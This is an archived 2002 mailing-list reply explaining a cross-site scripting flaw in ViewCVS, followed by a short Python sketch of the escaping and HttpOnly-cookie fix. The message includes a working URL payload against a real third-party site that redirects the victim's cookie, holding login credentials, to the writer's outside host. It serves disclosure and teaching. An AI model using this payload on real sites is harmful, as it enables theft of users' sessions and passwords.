
[Savannah-hackers] Re: [ViewCVS-dev] Re: Cross-Site Scripting of CVS syt


From: office
Subject: [Savannah-hackers] Re: [ViewCVS-dev] Re: Cross-Site Scripting of CVS sytem
Date: Wed, 27 Mar 2002 23:31:40 +0900

On Wed, 27 Mar 2002 04:30:35 -0800
Greg Stein <address@hidden> wrote:

> There is absolutely no call to be insulting.

I apologize to you, I'm sorry.

# But anyway, I am just an Internet user, not a hacker,
# I hate to think about computer code.

> Yes. *YOU* can help.

I'm Japanese, so explaining in English is very hard for me.
Have you imagined how many, many hours I spend making a short English report for
you?

> *However*, your code does not exhibit any of the typical characteristics of
> a C-SS problem.

If you go to Google (or any other search service without C-SS :P) and
enter <script>alert("hello")</script> as a keyword, you will know that
the code in the URL is a typical characteristic used to explain a C-SS vulnerable point.
To search for it, you need only a few seconds.

> So what I'd be interested in, is a clarification on how javascript embedded
> within the URL can be used as an attack method on a victim.

Do you want to know the malicious code?
I think that is not good sense.

Hmmm.

This demo needs Netscape Navigator 4.7*.
(If the conditions of the path of the CSS point and the cookie's path are right,
IE or other browsers are affected, but under this example's conditions the malicious code is
valid only for NN4.7*.)

Go to 
http://www.kent-web.com/pwd/gatex/gatex.cgi
This is the demo page of a Perl script for a secret room by kent-web.

Enter guest as the UserID, and enter guest as the password.
Check the check box to set a cookie for automatically entering the ID & pass at the next login.
And push the button, so you can enter the secret room (of the demo).

By the way, in the search system of kent-web, there is CSS.
You can see the CSS with
http://www.kent-web.com/cgi/wfinder.cgi?word=";><script>alert("hello")</script>
This is the same code that I reported to you about ViewCVS.

And now, I will show you the malicious code.
Access the URL
http://www.kent-web.com/pwd/gatex/../../cgi/wfinder.cgi?word=";><script>document.location%3D'http://www.office.ac/j.cgi?'%2Bdocument.cookie;</script>&view=10

Maybe you are kicked to the page on http://www.office.ac/j.cgi
and you can see your ID and password for kent-web's secret room, ON MY SITE.
Yes, I (or my site) could steal your cookie with that code.

This malicious demo was already reported to kent-web by me.
So it may be fixed quickly.
Hurry up, if you want to see the malicious code actually running.

That's all.
No more explanation is possible for me.
Does this very, very, very hard work give something to me?
I'm very tired...... almost to die.

You can read my reports about CSS on
http://www.office.ac/
Some reports are written in my strange English.
If you can read Japanese, there are more.

Bye....

--
office
address@hidden
http://www.office.ac/
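
From the defending side, the reflected `word` parameter shown in this message is closed by HTML-escaping it before it is echoed, and the login cookie can be kept out of reach of `document.cookie`. The Python sketch below is an added example, not part of the original message and not ViewCVS or kent-web code; the form markup, the function names, the cookie name and the cookie path are assumptions.

```python
import html
import secrets
from html.parser import HTMLParser
from http.cookies import SimpleCookie

# Constructed input: the probe string quoted in the message above.
PROBE = '";><script>alert("hello")</script>'

def render_unsafe(word):
    # Assumed pre-fix behaviour: the parameter is pasted into the attribute as-is.
    return '<form><input name="word" value="%s"></form>' % word

def render_safe(word):
    # html.escape(quote=True) encodes & < > " ' so the value can neither
    # close the attribute nor open a new element.
    return '<form><input name="word" value="%s"></form>' % html.escape(word, quote=True)

class TagAudit(HTMLParser):
    """Records each start tag and each value attribute an HTML parser sees."""
    def __init__(self):
        super().__init__()
        self.tags, self.values = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.values += [v for k, v in attrs if k == "value"]

def audit(markup):
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.values

def login_cookie():
    # Store an opaque random token instead of the ID and password, and mark it
    # HttpOnly so page script cannot read it. The path is an assumed value.
    jar = SimpleCookie()
    jar["session"] = secrets.token_urlsafe(32)
    jar["session"]["path"] = "/pwd/gatex/"
    jar["session"]["httponly"] = True
    return jar.output(header="").strip()

if __name__ == "__main__":
    print(audit(render_unsafe(PROBE)))  # a script element appears
    print(audit(render_safe(PROBE)))    # only form and input remain
    print(login_cookie())
```
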
